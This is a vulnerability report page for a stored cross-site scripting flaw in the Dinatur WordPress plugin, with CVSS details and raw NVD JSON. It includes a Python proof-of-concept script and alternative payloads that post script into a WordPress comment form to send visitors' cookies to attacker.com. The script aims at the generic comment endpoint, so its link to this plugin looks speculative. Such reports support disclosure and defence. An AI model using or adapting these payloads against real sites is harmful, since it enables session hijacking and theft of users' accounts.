Security Vulnerability Report
中文
CVE-2025-68866 CVSS 7.1 HIGH

CVE-2025-68866

Published: 2026-01-22 17:16:12
Last Modified: 2026-04-15 00:35:42

Description

Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in woofer696 Dinatur dinatur allows Stored XSS.This issue affects Dinatur: from n/a through <= 1.18.

CVSS Details

CVSS Score
7.1
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:L

Configurations (Affected Products)

No configuration data available.

Dinatur WordPress插件 <= 1.18

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2025-68866 PoC - Dinatur Plugin Stored XSS # Affected: Dinatur WordPress Plugin <= 1.18 import requests import sys target_url = "http://target-wordpress-site.com" # XSS payload - Cookie stealing example xss_payload = "<script>fetch('https://attacker.com/steal?c='+document.cookie)</script>" # Alternative payloads alt_payload_1 = "<img src=x onerror='fetch(\"https://attacker.com/log?data=\"+btoa(document.cookie))'>" alt_payload_2 = "<svg/onload=fetch('https://attacker.com/steal?c='+document.cookie)>" def exploit_stored_xss(): """Attempt to inject XSS payload into Dinatur plugin input fields""" # Target WordPress comment or form endpoint endpoint = f"{target_url}/wp-comments-post.php" # Common Dinatur input fields data = { 'comment': xss_payload, 'author': 'XSS Tester', 'email': '[email protected]', 'url': '', 'submit': 'Submit', 'comment_post_ID': '1' # May vary } try: response = requests.post(endpoint, data=data, timeout=10) if response.status_code == 200: print(f"[+] XSS payload submitted successfully") print(f"[+] Payload: {xss_payload}") print(f"[+] The XSS will execute when the comment is displayed") else: print(f"[-] Request failed with status: {response.status_code}") except requests.exceptions.RequestException as e: print(f"[-] Error: {e}") def verify_xss(): """Verify if XSS payload is stored and reflected""" # Check the page where the comment is displayed post_url = f"{target_url}/?p=1" # Adjust post ID as needed try: response = requests.get(post_url) if xss_payload in response.text: print("[+] XSS vulnerability confirmed!") print("[+] Payload is stored and will execute in victim browsers") else: print("[-] XSS payload not found or filtered") except requests.exceptions.RequestException as e: print(f"[-] Error: {e}") if __name__ == "__main__": print("CVE-2025-68866 - Dinatur Plugin Stored XSS PoC") print("=" * 50) exploit_stored_xss() verify_xss()

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-68866", "sourceIdentifier": "[email protected]", "published": "2026-01-22T17:16:12.163", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in woofer696 Dinatur dinatur allows Stored XSS.This issue affects Dinatur: from n/a through <= 1.18."}, {"lang": "es", "value": "Vulnerabilidad de Neutralización Incorrecta de la Entrada Durante la Generación de Páginas Web ('cross-site scripting') en woofer696 Dinatur dinatur permite XSS Almacenado. Este problema afecta a Dinatur: desde n/a hasta &lt;= 1.18."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:L", "baseScore": 7.1, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 2.8, "impactScore": 3.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-79"}]}], "references": [{"url": "https://patchstack.com/database/Wordpress/Plugin/dinatur/vulnerability/wordpress-dinatur-plugin-1-18-cross-site-scripting-xss-vulnerability?_s_id=cve", "source": "[email protected]"}]}}